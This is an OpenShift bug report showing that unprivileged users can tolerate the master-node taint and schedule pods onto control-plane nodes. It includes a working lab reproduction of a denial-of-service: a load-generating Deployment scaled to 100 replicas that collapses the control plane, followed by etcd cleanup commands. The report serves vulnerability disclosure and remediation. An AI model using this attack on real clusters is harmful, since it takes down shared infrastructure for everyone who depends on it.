Bug 1956497

Summary: Non-OpenShift pods are running on master nodes even though the `.spec.mastersSchedulable` field has value `false`.
Product: OpenShift Container Platform
Reporter: arajapa
Component: kube-scheduler
Assignee: Jan Chaloupka <jchaloup>
Status: CLOSED DEFERRED
QA Contact: RamaKasturi <knarra>
Severity: medium
Priority: medium
Docs Contact:
Version: 4.5
CC: akaris, aos-bugs, bhershbe, ealcaniz, gdiotte, jchaloup, mfojtik
Target Milestone: ---
Target Release: ---
Hardware: x86_64
OS: Linux
URL: https://gss--c.visualforce.com/apex/Case_View?id=5002K00000uELdKQAW
Whiteboard:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2021-05-17 08:36:10 UTC
Type: Bug
Regression: ---
Documentation: ---
Verified Versions:
Target Upstream Version:
Embargoed:

Description arajapa 2021-05-03 19:27:38 UTC
Description of problem:
Each master has the `NoSchedule` taint, and in the `schedulers.config.openshift.io/cluster` object the `.spec.mastersSchedulable` field has value `false`. However, the customer found a number of non-OpenShift pods unexpectedly running on master nodes.
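
For reference, the configuration in question looks roughly like this (a minimal sketch based on the field names above; values are illustrative, not copied from the customer cluster):

~~~
# Sketch of the scheduler configuration object referenced above (illustrative only)
apiVersion: config.openshift.io/v1
kind: Scheduler
metadata:
  name: cluster
spec:
  mastersSchedulable: false
~~~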


Version-Release number of selected component (if applicable):
4.5.16

How reproducible:


Steps to Reproduce:
1.
2.
3.

Actual results:


Expected results:


Additional info:

Comment 1 arajapa 2021-05-03 19:33:33 UTC
I was unable to link the bug to the case in SF, Case # is 02912203

Comment 2 Jan Chaloupka 2021-05-07 14:50:30 UTC
From https://docs.openshift.com/container-platform/4.5/nodes/nodes/nodes-nodes-working.html#nodes-nodes-working-master-schedulable_nodes-nodes-working:

```
You can configure master nodes to be schedulable, meaning that new pods are allowed for placement on the master nodes. By default, master nodes are not schedulable.
...
You can allow or disallow master nodes to be schedulable by configuring the mastersSchedulable field.
```

Some history:
In the past it was enough to set node.Spec.Unschedulable to decide whether a node is schedulable. This functionality was deprecated in 1.13 [1] and replaced by the node.kubernetes.io/unschedulable taint [2]. The kube-scheduler still reads node.Spec.Unschedulable to decide whether a node is feasible for scheduling; however, if a pod tolerates the taint, node.Spec.Unschedulable has no effect.
When a pod tolerating the taint is created, the kubelet does not see anything wrong with it and just runs the pod even on the master nodes.
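
For illustration, a minimal sketch of what this means for a cordoned node (my own example, not output from this cluster): cordoning sets the deprecated field and the node controller adds the replacement taint, so the node object carries both, and only the taint can be bypassed by a toleration:

~~~
# Sketch (illustrative, not from this cluster): node spec after `oc adm cordon <node>`
spec:
  unschedulable: true                      # legacy field, still checked by the scheduler
  taints:
  - key: node.kubernetes.io/unschedulable  # taint that replaced the legacy field
    effect: NoSchedule                     # a pod tolerating this taint is not blocked
~~~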

It is the machine-config-operator that consumes the mastersSchedulable field and, based on its value, either taints every master node with the following taint:

Key: node-role.kubernetes.io/master
Effect: NoSchedule

or removes it. Then either the pod tolerates the taint (and can be scheduled to a master node) or it does not. Also, given that a pod's nodeName can be set explicitly, this issue is not really about the kube-scheduler but rather about allowing a pod to tolerate any taint. The kubelet likewise has no say in deciding whether a pod that tolerates the taint should run on its node. So this needs to be decided before a pod is created/updated, i.e. through admission plugins. The question is what criteria decide whether a given pod is allowed to tolerate all taints (or specifically the node-role.kubernetes.io/master:NoSchedule one).

[1] https://github.com/kubernetes/kubernetes/blob/master/pkg/scheduler/framework/plugins/nodeunschedulable/node_unschedulable.go#L69-L72
[2] https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/#taint-based-evictions
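
One upstream direction for such an admission-time check, for illustration only: Kubernetes ships a PodTolerationRestriction admission plugin that can restrict tolerations per namespace via annotations. I have not verified whether or how it can be enabled on an OpenShift cluster, and the namespace name and whitelisted toleration below are placeholders.

~~~
# Sketch only, assuming the upstream PodTolerationRestriction admission plugin were enabled
# (not verified for OpenShift). Pods in this namespace could then only declare tolerations
# from the whitelist, which deliberately omits node-role.kubernetes.io/master:NoSchedule.
apiVersion: v1
kind: Namespace
metadata:
  name: user1   # placeholder namespace
  annotations:
    scheduler.alpha.kubernetes.io/tolerationsWhitelist: '[{"key": "example.com/dedicated", "operator": "Exists", "effect": "NoSchedule"}]'
~~~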

Comment 4 Jan Chaloupka 2021-05-10 07:16:27 UTC
Were the pods that got scheduled to master nodes (despite mastersSchedulable being set to false) created by an admin, or were they created by a regular user? If the former, we can update our documentation and provide a warning. If the latter, I suggest opening an RFE where we can discuss the next steps to resolve this issue.

Comment 5 Andreas Karis 2021-05-10 14:22:10 UTC
In upstream Kubernetes, there is nothing that stops a non-admin user from adding a toleration for any taint, at least according to the documentation:
https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/

It seems to be exactly the same in OpenShift.

Here's my test with 4.6.23:

Creating an unprivileged user and logging in with that user:
~~~
[root@openshift-jumpserver-0 ~]# export KUBECONFIG=/root/openshift-install/auth/kubeconfig
[root@openshift-jumpserver-0 ~]#  oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.6.23    True        False         32d     Cluster version is 4.6.23
[root@openshift-jumpserver-0 ~]# htpasswd -c -B -b users.htpasswd user1 MyPassword!
Adding password for user user1
[root@openshift-jumpserver-0 ~]#  oc create secret generic htpass-secret --from-file=htpasswd=users.htpasswd -n openshift-config
secret/htpass-secret created

[root@openshift-jumpserver-0 ~]# cat <<'EOF' | oc apply -f - 
apiVersion: config.openshift.io/v1
kind: OAuth
metadata:
  name: cluster
spec:
  identityProviders:
  - name: my_htpasswd_provider 
    mappingMethod: claim 
    type: HTPasswd
    htpasswd:
      fileData:
        name: htpass-secret 
EOF

[root@openshift-jumpserver-0 ~]# oc login -u user1 --password=MyPassword!
Login successful.

You don't have any projects. You can try to create a new project, by running

    oc new-project <projectname>

[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

~~~
oc new-project user1
cat <<'EOF' > pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: fedora-pod
  labels:
    app: fedora-pod
spec:
  containers:
  - name: fedora
    image: fedora
    command:
      - sleep
      - infinity
    imagePullPolicy: IfNotPresent
  tolerations:
  - key: "node-role.kubernetes.io/master"
    operator: "Exists"
    effect: "NoSchedule"
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - "openshift-master-0"
EOF
oc apply -f pod.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME         READY   STATUS    RESTARTS   AGE   IP            NODE                 NOMINATED NODE   READINESS GATES
fedora-pod   1/1     Running   0          21s   172.26.0.69   openshift-master-0   <none>           <none>
[root@openshift-jumpserver-0 ~]# 
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

Comment 6 Andreas Karis 2021-05-10 14:33:51 UTC
So this is upstream:
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185

The last one auto-closed; I'm still checking whether any progress was made beyond the discussions on the two issues.

Comment 7 Andreas Karis 2021-05-10 14:42:28 UTC
I created https://issues.redhat.com/browse/RFE-1856

Would that do it?

Do you have any idea for a workaround (I suppose we cannot control this via SCC?), or do you know if further progress has been made upstream beyond
https://github.com/kubernetes/kubernetes/issues/48041
https://github.com/kubernetes/kubernetes/issues/61185

Shall we close this BZ in favor of the RFE?

Thanks,

Andreas

Comment 8 Andreas Karis 2021-05-11 10:04:12 UTC
I updated the RFE with this, but I'll post it here nevertheless. This might become a high-priority issue for our customer rather quickly.

I am testing with virtualized masters, but I imagine that the issue can be reproduced similarly on baremetal machines by simply increasing the load further.  If my test is valid, then malicious, unprivileged users can easily generate so much load on any given cluster that the control plane collapses.

As an unprivileged user:
~~~
[root@openshift-jumpserver-0 ~]# oc whoami
user1
~~~

I create the following load-tester Deployment, where each pod will allocate 1 GB of memory and consume a full CPU (1000 ms of CPU time per second):
~~~
cat <<'EOF' > load.yaml 
apiVersion: apps/v1
kind: Deployment
metadata:
  name: load-tester
  labels:
    app: load-tester
spec:
  replicas: 1
  selector:
    matchLabels:
      app: load-tester
  template:
    metadata:
      labels:
        app: load-tester
    spec:
      containers:
      - name: load-tester
        image: quay.io/akaris/hpa-tester:latest
        command:
        - /bin/bash
        - -c
        - "churn 1000 & mallocmb 1024 & sleep infinity"
      tolerations:
      - key: "node-role.kubernetes.io/master"
        operator: "Exists"
        effect: "NoSchedule"
      affinity:
        nodeAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
            nodeSelectorTerms:
            - matchExpressions:
              - key: node-role.kubernetes.io/master
                operator: In
                values:
                - ""
EOF
oc apply -f load.yaml
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc get pods -o wide
NAME                           READY   STATUS    RESTARTS   AGE   IP             NODE                 NOMINATED NODE   READINESS GATES
fedora-pod                     1/1     Running   0          18h   172.26.0.69    openshift-master-0   <none>           <none>
load-tester-7f85bc7d49-crgmn   1/1     Running   0          11s   172.24.0.120   openshift-master-1   <none>           <none>
~~~

~~~
[root@openshift-jumpserver-0 ~]# oc scale --replicas=100 deployment load-tester
deployment.apps/load-tester scaled
~~~

That will spawn 100 replicas of the same pod (each one using a full CPU and trying to allocate 1 GB ... so roughly 33 of these pods per master).

And this will create gigantic loads on the masters:
~~~
top - 08:43:07 up 33 days, 14:21,  1 user,  load average: 350.09, 153.61, 59.21
Tasks: 639 total,  38 running, 598 sleeping,   0 stopped,   3 zombie
%Cpu(s): 51.4 us, 41.8 sy,  0.0 ni,  0.0 id,  2.3 wa,  2.6 hi,  1.9 si,  0.0 st
MiB Mem :  16034.0 total,    149.1 free,  14971.0 used,    913.8 buff/cache
MiB Swap:      0.0 total,      0.0 free,      0.0 used.    634.4 avail Mem 

    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                       
3208490 root      20   0 1931228 965940  15976 S 106.5   5.9 112:59.46 kube-apiserver                                
   5994 root      20   0 9066628 446848      0 S  83.9   2.7   2993:04 etcd                                          
   2647 root      20   0 6455880 207508      0 S  22.6   1.3   5569:50 kubelet                                       
[root@openshift-master-1 ~]# 
~~~

And the control plane will become unusable:
~~~
[root@openshift-jumpserver-0 ~]# time oc whoami
Error from server (InternalError): an error on the server ("") has prevented the request from succeeding (get users.user.openshift.io ~)

real	0m13.243s
user	0m0.171s
sys	0m0.041s
[root@openshift-jumpserver-0 ~]# time oc get pods
Unable to connect to the server: net/http: TLS handshake timeout

real	0m12.181s
user	0m0.198s
sys	0m0.030s
~~~

The master nodes become extremely unresponsive due to the increased load and the OOM situation, and eventually the Kubernetes control plane stops answering altogether:
~~~
[root@openshift-jumpserver-0 ~]# oc get pods
The connection to the server api.ipi-cluster.example.com:6443 was refused - did you specify the right host or port?
[root@openshift-jumpserver-0 ~]# 
~~~

In order to recover, I had to go to my master nodes and run:
~~~
sudo -i
systemctl stop kubelet ; crictl ps | grep load-tester | awk '{print $1}' | while read l ; do crictl stop $l ; done
~~~

The problem is that my SSH sessions were very unstable, too. I think at some point the OOM killer killed my session.
On another node, it literally took minutes to log in and I had to reboot it. Stopping the containers also took a long time.

After I stopped kubelet and removed all load-tester pods, I had to manually delete the deployment and all associated pods from etcd.

On one of the masters, I ran:
~~~
crictl ps | grep etcdctl
crictl exec 28117d1ac36c4 etcdctl del /kubernetes.io/deployments/user1/load-tester
crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/load | while read l ; do if [ "$l" != "" ]; then crictl exec 28117d1ac36c4 etcdctl del $l ; fi;  done
~~~

After the cleanup, I made sure that all keys for the load-tester deployment were gone:
~~~
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/pods/user1/
/kubernetes.io/pods/user1/fedora-pod
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/deployments/user1/
[root@openshift-master-0 ~]# crictl exec 28117d1ac36c4 etcdctl get --keys-only --prefix /kubernetes.io/replicasets/user1/
[root@openshift-master-0 ~]# 
~~~


And then, I could restart kubelet on all masters and the cluster finally recovered:
~~~
systemctl restart kubelet
~~~

- Andreas

Comment 9 Jan Chaloupka 2021-05-11 10:11:05 UTC
Thanks, Andreas, for filing the RFE. Given the potential severity of the issue, let's keep the BZ open for now.